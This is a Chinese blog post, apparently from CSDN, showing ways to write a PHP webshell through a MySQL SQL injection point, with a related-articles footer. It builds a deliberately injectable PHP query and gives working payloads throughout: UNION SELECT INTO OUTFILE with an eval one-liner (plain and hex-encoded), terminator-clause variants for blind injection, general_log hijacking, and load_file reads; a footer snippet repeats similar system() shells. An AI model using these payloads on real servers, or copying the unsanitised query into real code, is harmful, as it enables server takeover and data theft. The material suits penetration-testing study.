MySQL注入点写入WebShell的几种方式

最新推荐文章于 2024-08-02 15:49:51 发布
最新推荐文章于 2024-08-02 15:49:51 发布
阅读量1.5k 收藏 13
点赞数 1
文章标签: 数据库 mysql 安全漏洞 安全 SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45521281/article/details/106389760
版权

在工具化日益成熟的今天,手工注入的能力越来越被忽视了。当你掌握了一款工具的使用时,应更深入的去了解工具帮你做了什么,把工具所产生的影响控制在自己可控的范围内。

比如:当面对一个MySQL注入点,通过使用SQLmap--os-shell命令选项,便可轻松一键获取Webshell,但是非正常退出时,便会在网站目录中存留SQLmap临时上传的Webshell文件。

接下来,本文将通过构造一个注入点,分享几种Webshell写入的技巧。

0x01 构造一个注入点

1、在默认数据库test中创建测试表admin和测试数据,新建test用户授予FILE权限。

grant file on *.* to 'test'@'localhost';

但即使有了file权限,输出目录路径应该secure_file_priv一致,否侧文件操作不成功

mysql> show variables like '%sec%'
    -> ;
+--------------------------+----------+
| Variable_name            | Value    |
+--------------------------+----------+
| require_secure_transport | OFF      |
| secure_auth              | ON       |
| secure_file_priv         |          |
+--------------------------+----------+
1.MYSQL新特性限制文件写入及替代方法

高版本的MYSQL添加了一个新的特性secure_file_priv,该选项限制了mysql导出文件的权限

secure_file_priv

​ 1、限制mysqld 不允许导入 | 导出

​ --secure_file_prive=null

​ 2、限制mysqld 的导入 | 导出 只能发生在/tmp/目录下

​ --secure_file_priv=/tmp/

​ 3、不对mysqld 的导入 | 导出做限制

​ --secure_file_priv=

linux

cat /etc/my.cnf

​ [mysqld]

​ secure_file_priv=

win

my.ini

​ [mysqld]

​ secure_file_priv=

2、使用test用户连接数据库。

<?php
$con=mysql_connect("localhost","test","123456");
mysql_select_db("test", $con);
$id = $_REQUEST[ 'id' ];
$query  = "SELECT * FROM test.admin WHERE id = $id ";
$result = mysql_query($query);
......

0x02 写入WebShell的几种方式

1、利用Union select 写入

这是最常见的写入方式,union 跟select into outfile,将一句话写入evil.php,仅适用于联合注入。

具体权限要求:secure_file_priv支持web目录文件导出、数据库用户有File权限、获取物理路径。

?id=1 union select 1,"<?php @eval($_POST['g']);?>",3 into outfile 'E:/study/WWW/evil.php'

?id=1 union select 1,0x223c3f70687020406576616c28245f504f53545b2767275d293b3f3e22,3 into outfile "E:/study/WWW/evil.php"

2、利用分隔符写入

当Mysql注入点为盲注或报错,Union select写入的方式显然是利用不了的,那么可以通过分隔符写入。SQLMAP的 --os-shell命令,所采用的就是一下这种方式。

具体权限要求:secure_file_priv支持web目录文件导出、数据库用户File权限、获取物理路径。

?id=1 LIMIT 0,1 INTO OUTFILE 'E:/study/WWW/evil.php' lines terminated by 0x20273c3f70687020406576616c28245f504f53545b2767275d293b3f3e27 --+
此选项指定文本文件中行与行之间数据的分隔字符串 或者字符。

?id=1 into outfile 'C:/wamp64/www/work/webshell.php' lines terminated by '<?php phpinfo() ?>'--+;

同样的技巧,一共有四种形式:

?id=1 INTO OUTFILE '物理路径' lines terminated by  (一句话hex编码)#

?id=1 INTO OUTFILE '物理路径' fields terminated by (一句话hex编码)#

?id=1 INTO OUTFILE '物理路径' columns terminated by (一句话hex编码)#

?id=1 INTO OUTFILE '物理路径' lines starting by    (一句话hex编码)#

3、利用log写入

新版本的MySQL设置了导出文件的路径,很难在获取Webshell过程中去修改配置文件,无法通过使用select into outfile来写入一句话。这时,我们可以通过修改MySQL的log文件来获取Webshell。

具体权限要求:数据库用户需具备Super和File服务器权限、获取物理路径。

show variables like '%general%';             # 查看配置

set global general_log = on;               # 开启general log模式,将所有到达MySQL Server的SQL语句记录下来。

set global general_log_file = 'E:/study/WWW/evil.php'; # 设置日志目录为shell地址

select '<?php eval($_GET[g]);?>'             # 写入shell

set global general_log=off;                  # 关闭general log模式

附录:高权限文件读取

load_file()读文件——select load_file(‘目录’)。路径使用\\ ,否则会被当作转义符号。

http://test.com/sqli/Less-1/?id=-1' union select 1,load_file('c:\\flag.txt'),3 --+

img

zhang三
关注
  • 1
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux mysql webshell_通过MySQL写入webshell几种方式
weixin_39785723的博客
01-28 344
在实际写webshell的时候,我们经常会遭受到secure_file_priv的阻拦,secure_file_priv这个配置参数用来限制load data、outfile、load_file()的使用,其参数值有以下三种:1、NULL:表示不允许导入导出3、空,即没有具体值:表示不对导入导出做限制可使用如下命令来查看secure_file_priv的值:show global variable...
写入webshell几种方式
weixin_43239236的博客
01-24 2200
测试:pikachu平台 研究了几种写入webshell方式 一、上传漏洞写入 包含前端限制绕过、图片马绕过等一些绕过方法详细见https://www.cnblogs.com/dogecheng/p/11640389.html 二、sql注入写入 前提是有root权限 sql注入写入一句话木马 可以根据本地包含报错查找路径 C:\xampp\htdocs\pikachu\vul\fileinclude 也可以根据 union select 1,@@datadir查找mysql data路径 C:\xam
Mysql写入webshell两种方法总结-- into outfile,导入日志
qq_45730325的博客
05-19 3665
Mysql写入webshell
玄机靶场 第二章日志分析-mysql应急响应
qq_46343633的博客
06-05 1196
1.黑客第一次写入shell flag{关键字符串}2.黑客反弹shell的ip flag{ip}3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx4.黑客获取的权限 flag{whoami后的值}
mysql webshell_MySQL注入写入WebShell几种方式
weixin_35370061的博客
01-18 446
在工具化日益成熟的今天,手工注入的能力越来越被忽视了。当你掌握了一款工具的使用时,应更深入的去了解工具帮你做了什么,把工具所产生的影响控制在自己可控的范围内。比如当面对一个MySQL注入,通过使用SQLmap的--os-shell命令选项,便可轻松一键获取Webshell,但是非正常退出时,便会在网站目录中存留SQLmap临时上传的Webshell文件。一个MySQL注入写入Webshell,...
其他sql注入写入webshell方式
faclon666的博客
03-31 372
这时,我们可以通过修改MySQL的log文件来获取Webshell。fields terminated by原理为在输出数据的每个字段之间插入webshell内容,所以如果select返回的只有一个字段,则写入的文件不包含webshell内容,例如下面语句。注入原理:利用lines starting by语句进行拼接,拼接后面的webshell内容,lines starting by可以理解成以每行开始的位置添加xx语句。写入的文件中只包含username的值而没有webshell内容。
SQL注入写入webshell
bring_coco的博客
03-13 5817
前言 在所有常用的关系数据库管理系统中均包含内置的向服务器文件系统写文件的功能,通过这些内置的功能,我们可以将自己的webshell写目录或文件进去 写入webshell条件 1.MYSQL用secure_file_priv这个配置项来完成对数据导入导出的限制, 如果secure_file_priv=NULL,MYSQL服务会禁止导入和导出操作。 如果secure_file_priv=/tmp/,MYSQL服务只能在/tmp/目录下导入和导出 如果secure_file_priv="" ,MYSQL
sql注入写入webshell
qq_39816136的博客
04-18 1847
最近的hvv热度高涨,最近也是接到了许多的面试电话联系。 所有就sql注入出现的次数比较频繁,是初级hvv的重中之重 我感觉十有八九会问到sql注入,这里就解说一下这个sql注入写入webshell
SQL注入webshell
huangyongkang666的博客
03-25 2739
SQL注入webshell 1.MySQLshell 写入WebShell几种方式 1、利用Union select 写入 需要满足的条件 对web目录有写权限 GPC关闭(GPC:是否对单引号转义) 有绝对路径(读文件可以不用,写文件需要) 没有配置secure-file-priv ?id=1 union select '<?php assert($_POST["cmd"]);?>’ into outfile 'D:/WWW/evil.php' ?id=1 union select
一次靶机写入webshell几种方式
u2943013702的博客
04-16 857
访问该路径,自动下载了www.zip文件,打开查看是网站的源码,那么这个应该是网站的备份源码,不知道是那个管理员放在了网站根目录,在源码的配置文件里得到了数据库的root和密码。数据库管理phpmyadmin后台拿到shell的方法有两种,一种是into outfile 直接写入,一种是通过日志写入。接下来按照传统的思想,查找表名,查找列,最后得到了网站管理员的账号和密码。这是一个由phpstudy搭建的站的网站,尝试构造默认的网站根目录。更改路径为我们得到的绝对路径,也就是写入shell文件的位置。
第01篇:MySQL注入WebShell的5种方式1
08-03
本文将探讨如何利用MySQL注入写入WebShell的五种方法,重关注条件和具体步骤。 首先,确保存在一个可利用的MySQL注入至关重要。这通常发生在应用程序的输入验证不足,使得攻击者可以插入额外的SQL代码到查询...
MySQL注入中导出字段内容的研究通过注入导出WebShell
09-14
MySQL注入中,由于其...总之,虽然MySQL的特性限制了某些类型的攻击,但仍然存在多种方式利用SQL注入导出字段内容或创建WebShell。开发人员应当保持警惕,确保应用程序的安全性,遵循最佳实践来防止这些潜在的威胁。
SQLmap注入获取Webshell及系统权限研究.pdf
06-08
在网络安全领域,SQL注入是一种常见的攻击方式,被黑客用来获取对目标系统的未授权访问。`SQLmap`是一款开源工具,专门用于自动化地发现并利用SQL注入漏洞,进而获取数据库内容乃至服务器权限。本文将重介绍如何...
浅谈一次与sql注入 & webshell 的美丽“邂逅”
09-09
SQL注入是一种常见的网络安全漏洞,发生在应用程序未能充分验证或清理用户输入的数据时。当攻击者能够将恶意的SQL代码注入到查询中,他们可以获取敏感信息、修改数据库内容甚至完全控制数据库服务器。在上述案例中,...
MySql备份得到WebShell.pdf
10-10
MySql备份得到WebShell.pdf
简单的 mongoDB 学习
qq_19342829的博客
07-31 478
mongodb入门学习整理
社区养老服务小程序的设计
Karen198的博客
07-31 478
管理员账户功能包括:系统首页,个人中心,用户管理,服务人员管理,服务产品管理,服务预约管理,服务状态管理,服务退订管理,活动管理,视频管理。主要技术:Java,Spring,mybatis,mysql,jquery,html。服务器:SpringBoot自带 apache tomcat。微信端账号功能包括:系统首页,服务产品,活动,视频,我的。JDK版本:Java JDK1.8。数据库可视化工具: navicat。数据库版本: mysql5.7。开发工具:IDEA(推荐)开发系统:Windows。
用 Bytebase 实现批量、多环境、多租户数据库的丝滑变更
最新发布
Bytebase的博客
08-02 725
现在,你已学会如何使用部署配置和数据库分组在 Bytebase 中运行批量更改。动手试试吧!💡 更多资讯,请关注 Bytebase 公号:Bytebase。
sql注入如何写入webshell
05-11
在实施 SQL 注入攻击后,如果漏洞利用成功,攻击者可以通过 SQL 注入漏洞将任意命令注入到 SQL 语句中,从而达到执行任意代码的目的。以下是一些可能的方法: 1. 利用 union select 语句:在注入处添加 union select 语句,然后将 webshell 的代码写入到 select 后面的字段中,以获取服务器上的文件权限。 例如:假设漏洞在 id 参数处,可以使用以下语句在数据库中创建一个 webshell 文件: ``` ?id=-1 union select 1, '<?php eval($_POST["cmd"]);?>' into outfile '/var/www/html/shell.php' ``` 2. 利用 into outfile 语句:使用 into outfile 语句将数据导出到指定的文件中,并将 webshell 写入到这个文件中。 例如:假设漏洞在 id 参数处,可以使用以下语句在数据库中创建一个 webshell 文件: ``` ?id=-1 union select 1, "<?php echo system($_GET['cmd']);?>" into outfile '/var/www/html/shell.php' ``` 3. 利用 load_file 语句:使用 load_file 语句加载服务器上的文件,并将 webshell 写入到这个文件中。 例如:假设漏洞在 id 参数处,可以使用以下语句在数据库中创建一个 webshell 文件: ``` ?id=-1 union select 1, "<?php echo system($_GET['cmd']);?>" into outfile '/var/www/html/shell.php'; --' ?id=-1 union select 1, load_file('/var/www/html/shell.php') into outfile '/var/www/html/shell.php'; --' ``` 需要注意的是,写入 webshell 是非常危险的行为,攻击者需要谨慎考虑后果,以免对系统造成不可挽回的损失。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值